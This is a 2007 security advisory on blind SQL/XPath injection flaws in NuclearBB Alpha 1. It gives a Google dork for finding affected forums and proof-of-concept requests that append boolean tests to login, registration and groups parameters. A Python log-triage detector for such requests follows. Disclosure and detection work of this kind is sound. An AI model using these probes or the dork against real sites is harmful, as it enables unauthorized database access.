NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"

=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz password=passxyz submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

[EMAIL PROTECTED] [EMAIL PROTECTED] pass1=passwordxyz pass2=passwordxyz [EMAIL PROTECTED]"+and+"1"="0 [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

[EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]"+and+"1"="0 [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

[EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]"+and+"1"="0 coppa_state=over register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

[EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over&register_submit=Register

John Martinelli
[EMAIL PROTECTED]
http://john-martinelli.com

April 18th, 2007
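
For operators of an affected forum, a log-triage heuristic that flags requests carrying an appended boolean condition in the parameters listed above. This is an added example, not part of the original advisory or of NuclearBB: the function name `flag_request`, the regular expression and the sample requests are constructed here, and treating `g` as digits-only is an assumption drawn from its listing under numeric inputs.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory lists as injectable, keyed by script name.
AFFECTED = {
    "login.php": {"submit"},
    "register.php": {"website", "aol", "signature", "email"},
    "groups.php": {"g"},
}
# Assumption: groups.php's "g" is an integer id, so any non-digit value is suspect.
DIGITS_ONLY = {("groups.php", "g")}

# A boolean condition appended to a value, in the advisory's two shapes:
# numeric (1 and 1=0) and string (xyz" and "1"="0).
BOOLEAN_TAIL = re.compile(r"""\b(?:and|or)\s+["']?\w+["']?\s*=\s*["']?\w+""", re.I)


def flag_request(path, query="", body=""):
    """Return the sorted names of advisory-listed parameters that look tampered."""
    script = urlsplit(path).path.rsplit("/", 1)[-1]
    watched = AFFECTED.get(script, set())
    hits = set()
    for raw in (query, body):
        # parse_qsl URL-decodes, so "+and+" and "%20and%20" both become " and ".
        for name, value in parse_qsl(raw, keep_blank_values=True):
            if name not in watched:
                continue
            if (script, name) in DIGITS_ONLY and not value.isdigit():
                hits.add(name)
            elif BOOLEAN_TAIL.search(value):
                hits.add(name)
    return sorted(hits)


# Constructed sample requests: (path, query string, form body).
SAMPLES = [
    ("/groups.php", "g=1+and+1=0", ""),
    ("/groups.php", "g=7", ""),
    ("/login.php", "", 'username=xyz&password=passxyz&submit=Login"+and+"1"="0'),
    ("/login.php", "", "username=xyz&password=passxyz&submit=Login"),
]

if __name__ == "__main__":
    for path, query, body in SAMPLES:
        print(path, flag_request(path, query, body) or "clean")
```

The pattern is a triage aid and will also match innocent free text such as a signature containing "and x = y"; it does not replace fixing the queries in the application.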